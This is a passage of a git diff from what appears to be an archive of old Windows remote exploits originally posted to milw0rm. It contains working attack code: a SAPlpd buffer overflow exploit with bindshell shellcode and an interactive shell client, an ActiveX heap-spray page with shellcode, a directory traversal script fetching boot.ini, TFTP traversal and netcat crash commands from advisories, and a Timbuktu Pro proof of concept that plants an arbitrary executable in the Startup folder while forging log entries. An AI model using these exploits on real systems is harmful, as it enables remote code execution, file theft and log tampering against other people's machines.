+ "\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff"
+ "\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x60"
+ "\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23\xff\xff\xff\x89"
+ "\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x31\xdb\x56\x56"
+ "\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53"
+ "\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54\x50\x53\x53\x53"
+ "\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0\x05\xd0\xe8\xdf"
+ "\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb\x8d\x5f\xe8\xcf"
+ "\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8\xc2\xfe\xff\xff"
+ "\x83\xc4\x5c\x61\xeb\x89";
+
+#define SET_BIND_PORT(p) *(USHORT*)(shellcode+PORT_OFFSET)=htons(p);
+
+BOOL StartupWinsock(void)
+{
+ WSADATA wsa;
+
+ return !WSAStartup(MAKEWORD(2,0),&wsa);
+}
+
+DWORD LookupAddress(LPSTR lpHost)
+{
+ DWORD dwRemoteAddr=inet_addr(lpHost);
+
+ if (dwRemoteAddr==INADDR_NONE)
+ {
+ struct hostent* pHostEnt=gethostbyname(lpHost);
+ if (pHostEnt==0)
+ return INADDR_NONE;
+ dwRemoteAddr = *((DWORD*)pHostEnt->h_addr_list[0]);
+ }
+
+ return dwRemoteAddr;
+}
+
+SOCKET TCPConnect(DWORD dwIP,WORD wPort,DWORD dwTimeout)
+{
+ struct sockaddr_in sock_in;
+ struct timeval timeout;
+ DWORD fdWrite[2];
+ DWORD fdExcept[2];
+ SOCKET s;
+ int slResult;
+ int val=1,len=sizeof(int);
+
+ s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
+ if (s==INVALID_SOCKET)
+ return SOCKET_ERROR;
+
+ ioctlsocket(s,FIONBIO,(u_long*)&val);
+
+ fdWrite[0]=fdExcept[0]=1;
+ fdWrite[1]=fdExcept[1]=s;
+
+ memset(&sock_in,0,sizeof(sock_in));
+ sock_in.sin_port=wPort;
+ sock_in.sin_family=AF_INET;
+ sock_in.sin_addr.s_addr=dwIP;
+
+ connect(s,(struct sockaddr*)&sock_in,sizeof(sock_in));
+
+ timeout.tv_sec=dwTimeout/1000;
+ timeout.tv_usec=dwTimeout%1000;
+
+ slResult=select(0,NULL,(fd_set*)&fdWrite,(fd_set*)&fdExcept,&timeout);
+ switch(slResult)
+ {
+ case -1:
+ case 0:
+ {
+ closesocket(s);
+ return SOCKET_ERROR;
+ }
+
+ default:
+ {
+ if (!FD_ISSET(s,(fd_set*)&fdExcept))
+ {
+ val=0;ioctlsocket(s,FIONBIO,(u_long*)&val);
+ return s;
+ }
+ break;
+ }
+ }
+
+ closesocket(s);
+ return SOCKET_ERROR;
+}
+
+/* ripped from TESO code and modifed by ey4s for win32 */
+void Shell(int s)
+{
+ int l;
+ char buf[512];
+ struct timeval time;
+ unsigned long ul[2];
+
+ time.tv_sec=1;
+ time.tv_usec=0;
+
+ while(1)
+ {
+ ul[0]=1;
+ ul[1]=s;
+
+ l=select(0,(fd_set*)&ul,NULL,NULL,&time);
+ if(l==1)
+ {
+ l=recv(s,buf,sizeof(buf),0);
+ if (l<=0)
+ {
+ printf("\r\n[-] connection closed.\n");
+ return;
+ }
+ l=write(1,buf,l);
+ if (l<=0)
+ {
+ printf("\r\n[-] connection closed.\n");
+ return;
+ }
+ }
+ else
+ {
+ l=read(0,buf,sizeof(buf));
+ if (l<=0)
+ {
+ printf("\r\n[-] connection closed.\n");
+ return;
+ }
+ l=send(s,buf,l,0);
+ if (l<=0)
+ {
+ printf("\r\n[-] connection closed.\n");
+ return;
+ }
+ }
+ }
+}
+
+void ShowBanner(void)
+{
+ printf("%s",ASCII_SHIT);
+}
+
+void ShowSploit(void)
+{
+ printf("\t\tSAPlpd 6.28 Multiple Remote Buffer Overflows\r\n");
+ printf("\t\t Advisory by Luigi Auriemma\r\n");
+ printf("\t\t Exploit By BackBone\r\n");
+ printf("\r\n");
+}
+
+void ShowUsage(char* argv)
+{
+ int i;
+
+ printf("[*] %s host/ip[:port] target [bindport]\r\n",argv);
+ printf("[*] Default port: %d - Default bindport: %d\r\n",DEFAULT_PORT,BIND_PORT);
+ printf("[*] Target(s):\r\n\r\n");
+ for (i=0;i<(sizeof(targets)/sizeof(v));i++)
+ printf("\t%2d: %s (0x%08x)\r\n",i,targets[i].lpVersion,targets[i].dwRetAddr);
+}
+
+int main(int argc, char* argv[])
+{
+ LPSTR lpHost,lpPort;
+ ULONG ulIP;
+ USHORT usPort;
+ USHORT usBindPort;
+ SOCKET sSock;
+ int iTarget;
+ int iLen=0;
+ char lpBuffer[16384];
+
+ ShowBanner();
+ ShowSploit();
+
+ // check arguments
+ if (argc<3||argc>4)
+ {
+ ShowUsage(argv[0]);
+ return -1;
+ }
+
+ // get host/ip
+ lpHost=strtok(argv[1],":");
+ // get port
+ lpPort=strtok(NULL,":");
+ if (lpPort) usPort=(USHORT)atoi(lpPort);
+ else usPort=DEFAULT_PORT;
+
+ // startup winsock
+ if (!StartupWinsock())
+ {
+ printf("[-] WSAStartup() Failed.\r\n");
+ return -1;
+ }
+
+ // resolve host
+ ulIP=LookupAddress(lpHost);
+ if (ulIP==INADDR_NONE)
+ {
+ printf("[-] Invalid IP/Host.\r\n");
+ WSACleanup();
+ return -1;
+ }
+
+ // get target
+ iTarget=atoi(argv[2]);
+ if (iTarget<0||iTarget>(sizeof(targets)/sizeof(v))-1)
+ {
+ printf("[-] Invalid target.\r\n");
+ WSACleanup();
+ return -1;
+ }
+
+ printf("[+] Target: %s (0x%08x)\r\n",targets[iTarget].lpVersion,targets[iTarget].dwRetAddr);
+
+ if (argc==4) usBindPort=(USHORT)atoi(argv[3]);
+ else usBindPort=BIND_PORT;
+ SET_BIND_PORT(usBindPort);
+
+ // connecting
+ printf("[+] Connecting to %d.%d.%d.%d:%d ... ",ulIP&0xFF,(ulIP>>8)&0xFF,
+ (ulIP>>16)&0xFF,(ulIP>>24)&0xFF,usPort);
+
+ // connect
+ sSock=TCPConnect(ulIP,htons(usPort),10000);
+ if (sSock==SOCKET_ERROR)
+ {
+ printf("Failed!\r\n");
+ WSACleanup();
+ return -1;
+ }
+
+ printf("Ok.\r\n");
+
+ // construct buffer
+ memset(lpBuffer,0,sizeof(lpBuffer));
+
+ *lpBuffer=targets[iTarget].bLPDCmd;
+ iLen+=1;
+
+ memset(lpBuffer+iLen,0x90,targets[iTarget].dwOffset-sizeof(shellcode));
+ iLen+=targets[iTarget].dwOffset-sizeof(shellcode);
+
+ memcpy(lpBuffer+iLen,shellcode,sizeof(shellcode));
+ iLen+=sizeof(shellcode);
+
+ memcpy(lpBuffer+iLen,&targets[iTarget].dwRetAddr,4);
+ iLen+=4;
+
+ memcpy(lpBuffer+iLen,"\xE9\x98\x08\x00\x00",5); // jmp esp will execute this code, jmp to shellcode
+ iLen+=5;
+
+ memset(lpBuffer+iLen,0x41,1);// saplpd zeroes this byte
+ iLen+=1;
+
+ printf("[+] Sending buffer (size:%d) ... ",iLen);
+
+ // send buffer
+ if (send(sSock,lpBuffer,iLen,0)<=0)
+ {
+ printf("Failed!\r\n");
+ WSACleanup();
+ return -1;
+ }
+
+ printf("Ok.\r\n");
+
+ closesocket(sSock);
+
+ Sleep(1000);
+
+ // connecting
+ printf("[+] Connecting to %d.%d.%d.%d:%d ... ",ulIP&0xFF,(ulIP>>8)&0xFF,
+ (ulIP>>16)&0xFF,(ulIP>>24)&0xFF,usBindPort);
+
+ // connect to bindshell
+ sSock=TCPConnect(ulIP,htons(usBindPort),10000);
+ if (sSock==SOCKET_ERROR)
+ {
+ printf("Failed!\r\n");
+ WSACleanup();
+ return -1;
+ }
+
+ printf("Ok.\r\n\r\n");
+
+ // shell
+ Shell(sSock);
+
+ closesocket(sSock);
+
+ WSACleanup();
+
+ return 0;
+}
+
+// milw0rm.com [2008-02-07]
diff --git a/platforms/windows/remote/5087.html b/platforms/windows/remote/5087.html
index 20c1da6cb..39c3f8eb6 100755
--- a/platforms/windows/remote/5087.html
+++ b/platforms/windows/remote/5087.html
@@ -1,89 +1,89 @@
-
-
-
-
-
-
-
-# milw0rm.com [2008-02-09]
+
+
+
+
+
+
+
+# milw0rm.com [2008-02-09]
diff --git a/platforms/windows/remote/51.c b/platforms/windows/remote/51.c
index fa21b50a1..55e265be3 100755
--- a/platforms/windows/remote/51.c
+++ b/platforms/windows/remote/51.c
@@ -259,6 +259,6 @@ int sock, sck, h,i,j; printf("[+] Successfull, attempting to join shell ...\n\n"); shell(sck); return 0; -} - -// milw0rm.com [2003-07-08] +} + +// milw0rm.com [2003-07-08] diff --git a/platforms/windows/remote/5100.html b/platforms/windows/remote/5100.html index e46d9460e..8c1412acc 100755 --- a/platforms/windows/remote/5100.html +++ b/platforms/windows/remote/5100.html @@ -1,120 +1,120 @@ - - - - ImageStation (SonyISUpload.cab 1.0.0.38) ActiveX Buffer Overflow Exploit - - - - - Unable to create object - - - - -# milw0rm.com [2008-02-10] + + + + ImageStation (SonyISUpload.cab 1.0.0.38) ActiveX Buffer Overflow Exploit + + + + + Unable to create object + + + + +# milw0rm.com [2008-02-10] diff --git a/platforms/windows/remote/5102.html b/platforms/windows/remote/5102.html index 147ba061a..45a312ec1 100755 --- a/platforms/windows/remote/5102.html +++ b/platforms/windows/remote/5102.html @@ -1,47 +1,47 @@ - - - - - - - - -# milw0rm.com [2008-02-12] + + + + + + + + +# milw0rm.com [2008-02-12] diff --git a/platforms/windows/remote/5153.asp b/platforms/windows/remote/5153.asp index bef0ea089..b2e720d4f 100755 --- a/platforms/windows/remote/5153.asp +++ b/platforms/windows/remote/5153.asp 
@@ -1,37 +1,37 @@ -<%@ LANGUAGE = JavaScript %> -<% - -var act=new ActiveXObject("HanGamePluginCn18.HanGamePluginCn18.1"); - -//run calc.exe -var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063"); - -var bigblock = unescape("%u9090%u9090"); - -var headersize = 20; - -var slackspace = headersize+shellcode.length; - -while (bigblock.length - -# milw0rm.com [2008-02-19] +<%@ LANGUAGE = JavaScript %> +<% + +var act=new ActiveXObject("HanGamePluginCn18.HanGamePluginCn18.1"); + +//run calc.exe +var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063"); + +var bigblock = unescape("%u9090%u9090"); + +var headersize = 20; + +var slackspace = headersize+shellcode.length; + +while (bigblock.length + +# milw0rm.com [2008-02-19] diff --git a/platforms/windows/remote/5188.html b/platforms/windows/remote/5188.html index 759e5180a..523af0ac3 100755 --- a/platforms/windows/remote/5188.html +++ b/platforms/windows/remote/5188.html @@ -1,29 +1,29 @@ - - -Rising Online Scanner Insecure Method Vulnerability - - - -

    -wait for a few seconds after clicking the button - - -# milw0rm.com [2008-02-25] + + +Rising Online Scanner Insecure Method Vulnerability + + + +

    +wait for a few seconds after clicking the button + + +# milw0rm.com [2008-02-25] diff --git a/platforms/windows/remote/5190.html b/platforms/windows/remote/5190.html index 2172d8c93..86466dca6 100755 --- a/platforms/windows/remote/5190.html +++ b/platforms/windows/remote/5190.html @@ -1,119 +1,119 @@ - - - - - - - - - - - - -# milw0rm.com [2008-02-26] + + + + + + + + + + + + +# milw0rm.com [2008-02-26] diff --git a/platforms/windows/remote/5193.html b/platforms/windows/remote/5193.html index 3d13f23c1..9a3320fba 100755 --- a/platforms/windows/remote/5193.html +++ b/platforms/windows/remote/5193.html @@ -1,73 +1,73 @@ - - - - - - - -# milw0rm.com [2008-02-26] + + + + + + + +# milw0rm.com [2008-02-26] diff --git a/platforms/windows/remote/5205.html b/platforms/windows/remote/5205.html index ca29f2983..2e156f45b 100755 --- a/platforms/windows/remote/5205.html +++ b/platforms/windows/remote/5205.html @@ -1,122 +1,122 @@ - - - - Symantec BackupExec Calendar Control(PVCalendar.ocx) BoF Exploit - - - - - Unable to create object - - - - -# milw0rm.com [2008-02-29] + + + + Symantec BackupExec Calendar Control(PVCalendar.ocx) BoF Exploit + + + + + Unable to create object + + + + +# milw0rm.com [2008-02-29] diff --git a/platforms/windows/remote/5212.py b/platforms/windows/remote/5212.py index 26ca76043..21f3135bf 100755 --- a/platforms/windows/remote/5212.py +++ b/platforms/windows/remote/5212.py 
@@ -1,32 +1,32 @@ -import socket -import sys - -print '---------------------------------------------------------' -print 'MiniWebSvr 0.0.9a Directory Transversal Vulnerability' -print 'Project URL: http://miniwebsvr.sourceforge.net/' -print 'Author: gbr' -print 'Tested on Windows XP SP2' -print '---------------------------------------------------------' - -host = "127.0.0.1" -port = 8080 - -if sys.argv[1:]: - host = sys.argv[1] - if sys.argv[2:]: - port = int(sys.argv[2]) - -try: - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.connect((host, port)) - s.send("GET /%../../../../../../../../../../../boot.ini HTTP/1.0\r\n\r\n") - while True: - data = s.recv(4096) - if not data: - break - print data - -except: - print "Connection Error" - -# milw0rm.com [2008-03-03] +import socket +import sys + +print '---------------------------------------------------------' +print 'MiniWebSvr 0.0.9a Directory Transversal Vulnerability' +print 'Project URL: http://miniwebsvr.sourceforge.net/' +print 'Author: gbr' +print 'Tested on Windows XP SP2' +print '---------------------------------------------------------' + +host = "127.0.0.1" +port = 8080 + +if sys.argv[1:]: + host = sys.argv[1] + if sys.argv[2:]: + port = int(sys.argv[2]) + +try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, port)) + s.send("GET /%../../../../../../../../../../../boot.ini HTTP/1.0\r\n\r\n") + while True: + data = s.recv(4096) + if not data: + break + print data + +except: + print "Connection Error" + +# milw0rm.com [2008-03-03] diff --git a/platforms/windows/remote/5228.txt b/platforms/windows/remote/5228.txt index d8bb12ecc..ba22a8c52 100755 --- a/platforms/windows/remote/5228.txt +++ b/platforms/windows/remote/5228.txt 
@@ -1,98 +1,98 @@ -####################################################################### - - Luigi Auriemma - -Application: Acronis PXE Server - http://www.acronis.com/enterprise/products/snapdeploy/ -Versions: <= 2.0.0.1076 -Platforms: Windows -Bugs: A] directory traversal - B] NULL pointer -Exploitation: remote -Date: 08 Mar 2008 -Author: Luigi Auriemma - e-mail: aluigi@autistici.org - web: aluigi.org - - -####################################################################### - - -1) Introduction -2) Bugs -3) The Code -4) Fix - - -####################################################################### - -=============== -1) Introduction -=============== - - -The Acronis PXE Server is an essential component of Acronis Snap Deploy -Server, a deployment solution for automatically configuring all the -clients of the local network. - - -####################################################################### - -======= -2) Bugs -======= - ----------------------- -A] directory traversal ----------------------- - -The PXE Server (pxesrv.exe) implements a TFTP server for allowing the -downloading of the bootstrap files (uploading is not allowed). -This service is vulnerable to a classical directory traversal and an -arbitrary path attacks which allow an attacker to download any file -from the local disks or the network shares. - - ---------------- -B] NULL pointer ---------------- - -An incomplete TFTP request (anything which goes from the simple absence -of the option field to the usage of only the 2 bytes for the opcode) -causes the crashing of the PXE Server due to a NULL pointer access. 
- - -####################################################################### - -=========== -3) The Code -=========== - - -A] -http://aluigi.org/testz/tftpx.zip - - tftpx SERVER ..\../..\../boot.ini none - tftpx SERVER c:\boot.ini none - tftpx SERVER \\internal_host\documents\file.txt none - -B] -send the bytes 00 01 to UDP port 69 of the server: - - echo -n -e \x00\x01|nc SERVER 69 -v -v -u - - - -####################################################################### - -====== -4) Fix -====== - - -No fix - - -####################################################################### - -# milw0rm.com [2008-03-10] +####################################################################### + + Luigi Auriemma + +Application: Acronis PXE Server + http://www.acronis.com/enterprise/products/snapdeploy/ +Versions: <= 2.0.0.1076 +Platforms: Windows +Bugs: A] directory traversal + B] NULL pointer +Exploitation: remote +Date: 08 Mar 2008 +Author: Luigi Auriemma + e-mail: aluigi@autistici.org + web: aluigi.org + + +####################################################################### + + +1) Introduction +2) Bugs +3) The Code +4) Fix + + +####################################################################### + +=============== +1) Introduction +=============== + + +The Acronis PXE Server is an essential component of Acronis Snap Deploy +Server, a deployment solution for automatically configuring all the +clients of the local network. + + +####################################################################### + +======= +2) Bugs +======= + +---------------------- +A] directory traversal +---------------------- + +The PXE Server (pxesrv.exe) implements a TFTP server for allowing the +downloading of the bootstrap files (uploading is not allowed). +This service is vulnerable to a classical directory traversal and an +arbitrary path attacks which allow an attacker to download any file +from the local disks or the network shares. 
+ + +--------------- +B] NULL pointer +--------------- + +An incomplete TFTP request (anything which goes from the simple absence +of the option field to the usage of only the 2 bytes for the opcode) +causes the crashing of the PXE Server due to a NULL pointer access. + + +####################################################################### + +=========== +3) The Code +=========== + + +A] +http://aluigi.org/testz/tftpx.zip + + tftpx SERVER ..\../..\../boot.ini none + tftpx SERVER c:\boot.ini none + tftpx SERVER \\internal_host\documents\file.txt none + +B] +send the bytes 00 01 to UDP port 69 of the server: + + echo -n -e \x00\x01|nc SERVER 69 -v -v -u + + + +####################################################################### + +====== +4) Fix +====== + + +No fix + + +####################################################################### + +# milw0rm.com [2008-03-10] diff --git a/platforms/windows/remote/5230.txt b/platforms/windows/remote/5230.txt index 76a008051..997dee518 100755 --- a/platforms/windows/remote/5230.txt +++ b/platforms/windows/remote/5230.txt 
@@ -1,77 +1,77 @@ -####################################################################### - - Luigi Auriemma - -Application: Argon Client Management Services - http://www.argontechnology.com/product.aspx/cid1/43 -Versions: <= 1.31 (TFTP Boot Server <= 2.5.3.1) -Platforms: Windows -Bug: directory traversal in TFTP Boot Server -Exploitation: remote -Date: 08 Mar 2008 -Author: Luigi Auriemma - e-mail: aluigi@autistici.org - web: aluigi.org - - -####################################################################### - - -1) Introduction -2) Bug -3) The Code -4) Fix - - -####################################################################### - -=============== -1) Introduction -=============== - - ->From vendor's website: -"Client Management Services® (CMS) includes all the server-based -services (PXE Server, BOOTP Server) and administration tools needed to -setup an open network boot environment. You can deploy your favorite -third party client management tools in a pre-OS booting phase." - - -####################################################################### - -====== -2) Bug -====== - - -The TFTP Boot Server is affected by a classical directory traversal -vulnerability which allows an attacker to download (upload is not -allowed) any file from the disk where is located the tftp folder. 
- - -####################################################################### - -=========== -3) The Code -=========== - - -http://aluigi.org/testz/tftpx.zip - - tftpx SERVER ../../windows/win.ini none - tftpx SERVER ..\boot.ini none - - -####################################################################### - -====== -4) Fix -====== - - -No fix - - -####################################################################### - -# milw0rm.com [2008-03-10] +####################################################################### + + Luigi Auriemma + +Application: Argon Client Management Services + http://www.argontechnology.com/product.aspx/cid1/43 +Versions: <= 1.31 (TFTP Boot Server <= 2.5.3.1) +Platforms: Windows +Bug: directory traversal in TFTP Boot Server +Exploitation: remote +Date: 08 Mar 2008 +Author: Luigi Auriemma + e-mail: aluigi@autistici.org + web: aluigi.org + + +####################################################################### + + +1) Introduction +2) Bug +3) The Code +4) Fix + + +####################################################################### + +=============== +1) Introduction +=============== + + +>From vendor's website: +"Client Management Services® (CMS) includes all the server-based +services (PXE Server, BOOTP Server) and administration tools needed to +setup an open network boot environment. You can deploy your favorite +third party client management tools in a pre-OS booting phase." + + +####################################################################### + +====== +2) Bug +====== + + +The TFTP Boot Server is affected by a classical directory traversal +vulnerability which allows an attacker to download (upload is not +allowed) any file from the disk where is located the tftp folder. 
+ + +####################################################################### + +=========== +3) The Code +=========== + + +http://aluigi.org/testz/tftpx.zip + + tftpx SERVER ../../windows/win.ini none + tftpx SERVER ..\boot.ini none + + +####################################################################### + +====== +4) Fix +====== + + +No fix + + +####################################################################### + +# milw0rm.com [2008-03-10] diff --git a/platforms/windows/remote/5238.py b/platforms/windows/remote/5238.py index a33f5cada..94026eb06 100755 --- a/platforms/windows/remote/5238.py +++ b/platforms/windows/remote/5238.py 
@@ -1,274 +1,274 @@ -# Core Security Technologies - CoreLabs Advisory -# http://www.coresecurity.com/corelabs - -# Title: Timbuktu Pro Remote Path Traversal and Log Injection -# Advisory ID: CORE-2008-0204 -# Advisory URL: http://www.coresecurity.com/?action=item&id=2166 -# Date published: 2008-03-11 -# Date of last update: 2008-03-11 -# Vendors contacted: Motorola -# Release mode: Forced release - -# Proof of concept code follows. This PoC allows a remote attacker to -# upload a file to an arbitrary location on the victim's machine and forge -# peer information on the log lines of the victim's application. - -from sys import argv -from socket import * -from struct import pack - -#from utils import printFormatted -#from time import sleep - -init_send_op_packet = ( '\x00\x01\x60\x00\x00\x52\x00\x25' - '\x00\x22\x02\x01\x00\x04\x03\x07' - '\x00\x05\x00\x01\x00\x00\x00\xf1' - '\x06\x00\xf7\x76\xdd\x77\x00\x00' - '\x00\x00\x08\x7c\x67\x60\x00\x00' - '\x00\x00\x00\x00\x00\x00\x00\x00' - '\x00\x00\x18\xf1\x06\x00\xd1\x90' - '\xbc\x60\x38\xf1\x06\x00\x32\x94' - '\xc1\x60\x50\x92\xc4\x60\x00\x00' - '\x00\x00\x18\x92\xc4\x60\x2d\xbe' - '\x80\x7c\x08\x7c\x67\x60\x20\x46' - ) - -second_send_op_packet = ( '\x00\x01\x61\x00\x00\x52\x00\x25' - '\x00\x22\x02\x01\x00\x04\x03\x07' - '\x00\x05\x00\x01\x10\x00\xe0\xf0' - '\x06\x00\x51\x05\x91\x7c\x28\x09' - '\x08\x00\x6d\x05\x91\x7c\x1c\xf1' - '\x06\x00\x02\x00\x00\x00\x10\x00' - '\x00\x00\xb8\xf5\xbe\x60\x00\x00' - '\xac\x00\x00\x00\x00\x00\xbd\xf5' - '\xbe\x60\x30\x90\xc4\x60\x07\x00' - '\x00\x00\xd0\x13\x63\x60\x71\xfb' - '\x90\x7c\x40\xf0\x06\x00\x0e\x00' - ) - -peer_info_exchange = ( '\x00\x01\x62\x00\x00\xb0\x00\x23' - '\x07\x22\x03\x07\x70\x2c\xa5\x51' - '\x4c\xca\xe3\xfb\x70\x2c\xa5\x51' - '\x4c\xca\xe3\xfb\x00\x09' - '%(user_name)s' - '\x01\x97' - '%(host_name)s' - '' - '\x00\x00\x01\x02\x00\x04' - '\xb1\x1c\x39\x51\x00\x00\x00\x00' - '%(guest_ip_address)s' - '\x00\x00\x00\x00\x00\x00' - '\x00\x00\x00\x00\x00\x00' - ) - 
-ack_peer_info = '\xff' - -attach_info_packet = ('\xfb\x00\x00\x00\x00' - 'BINAmdos' - '\xc2\x12\x49\xaf\xbd\x35\xac\x98' - '\x00\x00\x00\x00' - '%(attachment_length)s' - '\x00\x00\x00\x00' - '\xff\xff\xff\xff\x00\x00\x00\x00' - '\x00\x00\x00\x00\x00\x00\x00\x00' - '\x00\x00\x00\x00\x00\x00' - '%(attachment_filename)s' - ) - -attach_info_ack1 = '\xf9\x00' - -# Transfer file content here !!! -# \xF8 + 2 byte length + data - -attach_file_ack1 = '\xf7' - -attach_file_ack2 = '\xfa' - - -class Tb2FileSender: - ''' - Fake timbuktu client that implements the 'Notes' feature to send a - message with a file attached to it. - ''' - - def __init__(self, target, fake_src_ip, fake_hostname, fake_username, dest_filename, file_content): - ''' - Setup TCP Connection to standard port TCP/407 - ''' - self.sck = socket(AF_INET, SOCK_STREAM) - self.sck.connect((target, 407)) - self.fake_src_ip = fake_src_ip - self.fake_hostname = fake_hostname # Peer computer name - self.fake_username = fake_username # Peer user name - self.dest_filename = dest_filename # Destination filename including path (like ../../a.exe) - self.file_content = file_content # Content of the destination file - - def sendAndRecv(self, packet, log, expected_response_length=0x500, print_response=False): - self.sck.send(packet) - if log: - print '[-] %s' % log - if expected_response_length > 0: - resp = self.sck.recv(expected_response_length) - if print_response: - #printFormatted(resp) - print '-' * 70 + '\n' - return resp - return None - - def getPascalString(self, str): - ''' - Format the strings as 1 Byte Length + String. - ''' - return pack('B', len(str)) + str - - def createFakePeerInfoPacket(self): - ''' - Create a packet with forged guest information to avoid giving away - real info in the log files. - ''' - # - # Ohhh... by the way, these two names goes diretly to the log file... 
ehehhee :) - # - guest_host_name = self.fake_hostname.replace('\\n', '\r\n') - guest_user_name = self.fake_username.replace('\\n', '\r\n') - - username_max_len = 0x37 # This is not the application real limit, - hostname_max_len = 0x3f # but it is the limit for this packet. - - host_name = self.getPascalString(guest_host_name) - user_name = self.getPascalString(guest_user_name) - - # Pad the string to fill the empty space and avoid packet length recalculation - host_name += ('\x00' * (hostname_max_len - len(guest_host_name))) - user_name += ('\x00' * (username_max_len - len(guest_user_name))) - - guest_ip_address = self.fake_src_ip.split('.') - guest_ip_address = pack('BBBB', int(guest_ip_address[0]), int(guest_ip_address[1]), int(guest_ip_address[2]), int(guest_ip_address[3])) - - return peer_info_exchange % vars() - - def getAttachContent(self): - ''' - Retrieve the content of the local file and send it as the attach content. - ''' - fd = open(self.file_content, 'rb') - data = fd.read() - fd.close() - return data - - def send(self): - ''' - Send a sequence of packet to upload our data to the filename and path - specified by the user's parameters. - ''' - - # Begin protocol negotiation with the target - self.sendAndRecv(init_send_op_packet, 'Note Operation initial packet sent.') - self.sendAndRecv(second_send_op_packet, 'Note Operation negotiation packet sent.') - - # Send the packet with our fake info to fool the logs :) - self.sendAndRecv(self.createFakePeerInfoPacket(), 'Peer info packet sent.') - self.sendAndRecv(ack_peer_info, 'Ack peer info packet sent.') - - # Setup attachment packets that contain information about the file being transfered - max_trx_chunk_size = 0x5B4 - trx_until_resync = 0x16C5 - - payload = self.getAttachContent() - payload_length = len(payload) - attachment_length = pack('>L', payload_length) - - # - # Send info about the attachment. - # - # The '\' character is nedded to bypass the application filter. - # This is actually the Bug ! 
- attachment_filename = self.getPascalString('\\' + self.dest_filename.replace('\\', '/')) - - attach_info = attach_info_packet % vars() - - self.sendAndRecv(attach_info , 'Attachment info sent.') - self.sendAndRecv(attach_info_ack1, 'Attachment intermediate info sent.') - - # Create a list with the chunks to send and prepare their headers is appropriate - attachment_content = list() - - # We check if the data to send fits into one set of chunks. - if payload_length < max_trx_chunk_size: - attachment_content.append('\xF8' + pack('>H', payload_length) + payload) - else: - # If the data is bigger than one chunk, then send multiple chunks and their headers. - curr_pos = 0 # keeps our current position into the data file content - resync_chunk = True # flag to indicate if a new set of chunk should be set - pos_in_chunk = 0 # keeps our position into the current chunk set - do_recv = False # flag to indicate if recv is needed to receive target data - - while curr_pos <= payload_length: - do_recv = False - # Is this the last chunk ? - if curr_pos > 0 and pos_in_chunk != trx_until_resync: - # If it is the last chunk, then just set length to the rest of the data - if trx_until_resync - pos_in_chunk < max_trx_chunk_size: - chunk_length = trx_until_resync - pos_in_chunk - do_recv = True - else: - # Otherwise, set the data length as usual because it's an intermediate chunk - chunk_length = max_trx_chunk_size data = '' - else: - # Start a new set of chunks and check if this is not the last set - # If it is, then don't set the maximun size, just the rest of the length. - data = '\xF8' # Set the chunk set header - if payload_length - curr_pos < trx_until_resync: - chunk_length = payload_length - curr_pos - data += pack('>H', chunk_length) - else: - # This is not the last chunk, so we set the maximun size and begin - # it transmittion. 
- chunk_length = max_trx_chunk_size - data += pack('>H', trx_until_resync) pos_in_chunk = 0 - - # Append the current chunk into a list to be sent later - attachment_content.append((do_recv, data + payload[curr_pos : curr_pos + chunk_length])) - curr_pos += chunk_length - pos_in_chunk += chunk_length - - # - # Send file content in small chunks - # - print '[-] Beginning file transfer... (this may take some time)' - for chunk in attachment_content: - if chunk[0]: - do_recv = 0x500 - else: - do_recv = 0 - self.sendAndRecv(chunk[1], '', do_recv) - #sleep(0.5) - print '[-] File transfer complete' - - # Send the final ACKs to allow the program to create the remote file. - self.sendAndRecv(attach_file_ack1, 'Note body intermediate info sent.') - self.sendAndRecv(attach_file_ack2, 'Note body intermediate info sent.') - - # Close the connection here to avoid the program displaying any message - self.sck.close() - return - - -if __name__ == "__main__": - if len(argv) != 7: - print (r'\nUsage:\n\n%s ' - ' \n\n' - 'Example:\n\n' - '%s victim.com 1.2.3.4 trust.com yourAdmin "..\..\..\Documents And Settings\All Users\Start Menu\Programs\Startup\evil.exe" c:\payload.exe' % (argv[0], argv[0]) ) - else: - target = argv[1] - fake_src_ip = argv[2] - fake_hostname = argv[3] - fake_username = argv[4] - dest_filename = argv[5] - file_content = argv[6] - - tb2 = Tb2FileSender(target, fake_src_ip, fake_hostname, fake_username, dest_filename, file_content) - tb2.send() - -# milw0rm.com [2008-03-11] +# Core Security Technologies - CoreLabs Advisory +# http://www.coresecurity.com/corelabs + +# Title: Timbuktu Pro Remote Path Traversal and Log Injection +# Advisory ID: CORE-2008-0204 +# Advisory URL: http://www.coresecurity.com/?action=item&id=2166 +# Date published: 2008-03-11 +# Date of last update: 